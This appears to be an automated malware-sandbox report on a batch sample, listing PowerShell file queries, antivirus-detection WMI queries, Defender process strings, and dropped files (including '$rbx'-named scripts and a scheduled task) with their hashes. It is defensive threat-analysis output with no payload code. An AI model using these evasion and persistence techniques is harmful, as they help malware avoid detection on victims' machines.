Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\$rbx-QgS1M4PT VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\$rbx-QgS1M4PT VolumeInformation

Source: C:\Windows\System32\dllhost.exe

Code function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

38_2_0000000140002300

Source: C:\Windows\System32\cmd.exe

Code function: 19_2_0000022413908090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

19_2_0000022413908090

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.10.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: dllhost.exe, Amcache.hve.10.dr, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.50.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

ID:	1525473
Product:	CloudBasic
Start time:	09:41:04
Start date:	04.10.2024
Sample:	1.cmd
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	19fc666f7494d78a55d6b50a0252c214
SHA1:	8876cd520507cbfdc2e89e449baba52232a1df1b
SHA256:	e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
Filetype:	BibTeX references (5501/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_dc34baa62d94b1453e37c8fdf4c57a0ef7376b6_e3b0f337_9f80d8da-31df-4b2c-bcfb-31830925e2b8\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	37B792005EDF19E81B1ABF66F4816740	25CE8BA8EC3598029550DF1167F687BA149224E9	49E129B1A9E5646E7F885D389A8DE9904AEB4E52AF89A5E08C72CB88D346737A
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_dc34baa62d94b1453e37c8fdf4c57a0ef7376b6_e3b0f337_fa750e7d-2e62-4703-86c1-e8771ad7fadd\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	FAC113DBE19E9E416829F0587F94C759	31F9BCF76E16F2E3B6BF8BDE349FC80747F8C834	D8A5F4773BAD869F44A72EEC61DD3366B0EF6FE88220DD8F09840002DD1BAF6C
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3551.tmp.dmp	Mini DuMP crash report, 15 streams, Fri Oct 4 07:43:03 2024, 0x1205a4 type	0186EDC09DE9EC5B51F90584832B1AFD	0826BD65936D35E8DC1FB60C15B9F1424D2FF096	9D41FB17AF3AB8C3638D7F3984A7E00D7AA1BCB026D532059AB1B973DF394967
C:\ProgramData\Microsoft\Windows\WER\Temp\WER38BD.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	429C3655DB86FC5D632BCA554BD68B74	3DCB1437F73F7EB3758D2A5671A3C0A89EA23769	87A0C3E6C8C1708DED1F242FCF73E74ACD6A8FE515738B2EAC82DCA6F2E89986
C:\ProgramData\Microsoft\Windows\WER\Temp\WER392B.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	2E7AF1C2D5455D8BD63955ADCD51D1CA	8E81343878DEF226DC1277F09E2F42D745B56CB4	02C13AE00132915770DF9ABB6EC83AE10C4227FA42AFA44636E92FEB76CEAE3C
C:\ProgramData\Microsoft\Windows\WER\Temp\WER604E.tmp.dmp	Mini DuMP crash report, 15 streams, Fri Oct 4 07:42:09 2024, 0x1205a4 type	01906B17B4E0673452E66F364167027B	59C6FE188D94AA7562042052151AD5A0A039794F	8694B873A8C186696BAD061EDB951963A4E95FEA77A0EBC2FB0E9B99BB66B9D1
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6446.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	2D0362889AB324F37447CE118E10AA1F	22404E67C9777467F4DF17B789448563D1366C5F	6BCED54C544A05B0A5A033EECFD1CCC4E1D42122FEEF9C6EA48C15AACC8A1A81
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6476.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	DFBAB05D482F5526D54EE52B5FB16057	E266952E1D8D6B1FAB0AD130B062969B5A1BDBCA	248DE062EA64BD2AC8F0E6B81CCC293F4D885BFF18567FEBD1A001DD10FDA1DB
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	BA7C69EBE30EC7DA697D2772E36A746D	DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359	CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	data	D689C25F0EDEEC305A2F2409A351E182	BD5874971D56F1ED49E405FF4FAFD25F323BD41A	29A8A13B5957E5011C76C9CF249DBB7B8110C1761401021B29D135B11232D097
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3bbo2kri.le0.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qgxuuvs.0li.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b32b30w1.tgj.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5r0ihk5.kzs.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_squa0cl3.qra.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uy1ul2eh.yqr.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\$nya-Logs\2024-10-04	DOS executable (COM, 0x8C-variant)	FE5F105C5FE691A4724079A34C3FD002	607724412F46E8221F65C2869DF87E7CAA5D288A	A6848E3050D90F07544F46CAE503C87A3A3D73E18858D2A60D7D1BF977955096
C:\Users\user\Documents\20241004\PowerShell_transcript.128757.CxMBvNgr.20241004034233.txt	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	784CCEAD8246F1D9B0B0233774243374	05C1B6AB474713446F3310C5463A8BB5CD0FBD08	94F81DCB3AA9BF4A2E7261F0735FBB15445C9F72AA3CDEE6E6D7006D898A7CA2
C:\Users\user\Documents\20241004\PowerShell_transcript.128757.UJcpkVmk.20241004034203.txt	Unicode text, UTF-8 (with BOM) text, with very long lines (2684), with CRLF line terminators	141D50A8BBC12D18153D981E74F7421B	229EFFB65263021AA2609644FC85BC7DCC1886FD	6BD9C223DF78316DB7E1C4D348D1B1C5E61CB97F0B01B9807C41AD3B34B3D59C
C:\Users\user\Documents\20241004\PowerShell_transcript.128757.hSiBdkli.20241004034257.txt	Unicode text, UTF-8 (with BOM) text, with very long lines (2692), with CRLF line terminators	3AD5707222C23F76FFDF0619C8AC6D25	453EA743B95692E13F665F8F0EC46B3BBBAA0C4D	EBA01D3DF9AF7A904BB764BBA987782A74E2252D9F315D5EFFC6304FDB2E6288
C:\Windows\$rbx-onimai2\$rbx-CO2.bat	DOS batch file, ASCII text, with very long lines (5674), with CRLF line terminators	19FC666F7494D78A55D6B50A0252C214	8876CD520507CBFDC2E89E449BABA52232A1DF1B	E96F8F61E3AF77C429AE6AF54C128F7B8420A45A0A63BDFCACD682773B8E5FC1
C:\Windows\$rbx-onimai2\$rbx-CO2.bat:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Windows\System32\20241004\PowerShell_transcript.128757.tvTEgCNQ.20241004034311.txt	Unicode text, UTF-8 (with BOM) text, with very long lines (5360), with CRLF line terminators	5AD398834C8E25723975DED4B2D02597	5EA89BAD95268DA60FF5123220E5C6E9592605B4	A7E6F5069C4185EC5523D5951C49C9034A91ACC6F367B022A52CB72424CE0558
C:\Windows\System32\Tasks\$rbx-QgS1M4PT	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	3D2655B2FBBD4D24033DBB79B921697C	08CE2A84327E1EEF614008809F15A9F126B28A05	2CFED75D94EC6FC435D61F370CCA3D40E910A8FB10A97D45D51FFEE0F87A7793
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	C31A1BA17DD8856E8E930807FA308CBE	96AAFF7B013066D2EDA2958128FD049915028849	91620CED47374C83D43981E1930EF7C78B6E7651F108F6CB18A60CAE8487E1CF
C:\Windows\System32\wbem\Performance\WmiApRpl_new.h	ASCII text, with CRLF line terminators	B133A676D139032A27DE3D9619E70091	1248AA89938A13640252A79113930EDE2F26F1FA	AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini	Unicode text, UTF-16, little-endian text, with CRLF line terminators	9D007E669CE25371EE9401DC2AC21D2A	6F0CACCD76F7A94BBCB1124D398E9139E09C6FC4	632004D14715476801408FC10E1B119BDC90378D2E8D573B7C14A06816799FA8
C:\Windows\System32\winevt\Logs\Application.evtx	data	35F5E61B44C99E5961D791D65DD17821	EEECB77D0C11E84E03F3A3D8D32DA60B0C425431	B6B776F4A27841D857B1CC867F758A0616F9774142F2A55DDB3A2440934D6BA3
C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx	data	8EF6E9746DE72295DFCB3197A49966C3	3FF34508B83382569DF87C14DDFF8596D1E29980	BEBF782FCDAD337843593DEE32D030C922424367A50078E30329BE63259E648A
C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx	data	26C4C5213F3C6B727417EF07207AC1E0	1815CC405C8B70939C252390E2A1AEC87EFF45F2	767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx	data	EE25A9478FAB4FBAB6D89F9F2E7C7EF4	643403023901E8CB6CB7AE3269A883C2BA3CC4C7	699618BC087165CE1AC1F7BE088642E80AA920F351D74DDD3454FA2BFA37C374
C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx	data	D6AA1FCD43790A397134C5CFC5A86D46	3F8C5749681331F3316BAEE46632ECDA80712CED	C3DA75ABD049DCEDF544ED37E2F12F71ACF2B6C7B0E4E8B13209415F831D266A
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx	data	C665BB87978EBBDC71354545579E80C0	CC7F6C571B7198162112AF051CDD8B88FF24A626	DBBA0D6AEE8D46D3D7EDE566ED4EB6356B8C9D914258DE3B7C8BDECDF2C13325
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx	data	4FB8E2CF8B3F20534836684947962DC2	B263607E627C81DA77DB65DF5AED2F3FD84B83E2	DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	data	2DE60575CB719BF51FAB8A63F696B052	BD44E6B92412898F185D5565865FEA3778573578	7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx	data	EE1D987C758D86C483BAFBEA2EDEACFA	AED9B378A9200B09637BE24A9ED6F85E3E632EE6	2D7FB5C71035E8C85B1B98772FAC93D8F72E49853A5D68D1CE2F41E7B8EA5466
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx	data	B8E105CC52B7107E2757421373CBA144	39B61BEA2065C4FBEC143881220B37F3BA50A372	B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx	data	39EE3557626C7F112A88A4DE12E904C1	C307FECC944D746A49EEA6451B7DA7301F03504C	2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx	data	139666E45F01B24FAF6F0BBD3C472C73	FFA815ED1A88F4E54C2DECE84DD0427E74D23AB1	679A66239AE8631182914EFA619C38FA70FBE8D2119303D56039FE0D23BB32ED
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx	data	A2D41740C1BAF781019F282E37288DDF	A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621	7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx	data	A00BAFFCABB00428EA0512FCECCC55E5	19F7C942DC26C3FF56D6240158734AFF67D6B93E	92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx	data	399CAF70AC6E1E0C918905B719A0B3DD	62360CD0CA66E23C70E6DE3340698E7C0D789972	FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx	data	2BB73ACC8F7419459C4BF931AB85352C	F1CE2EB960D3886F76094E2327DD092FC1208C7E	1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx	data	86AEA3A9CA3E5909FD44812754E52BD6	F79B583F83F118AC724A5A4206FC439B88BB8C65	2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx	data	155681C222D825199B738E8DEC707DC8	704C800E7313F77A218203554E1428DF2819BC34	1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx	data	F22AC858C2ACC96E8F189E43FFE46FBD	540B8276921D37FCFFDA3FC7BCFAE1D99A85433B	771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx	data	6C3F290FC62CFA9C240AEE8DB1DBA277	CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC	7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx	MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 143, DIRTY	D7FAC000E8F833A09029633F2D80D4F8	54CAA6333B82E5D3FAB81C8614C971A0258C288D	E8A82460CEE168F5FDB02EA5C31E287F42BD9B165DB485F52E4D8CB55FFF16DA
C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx	data	16CCF2E39D0F94601315CA4B84A958FA	1EAB2C9C5BB4B15DAA500F9DCF120C0447C10287	BC75B1048966FEDFCBF30DB7715B195B22FE7478D53F9AB1747302C37D2DC891
C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx	data	A51AFE78FA4481FA05EDC1133C92B1D8	5BA44E7A99EE615E323696742DA6B930E9FF6198	44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx	data	A8ADBDC2B39B55444B2C844F7D81EBDE	F97F40E314C8A2A39953A28CB72C9270D3073418	93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
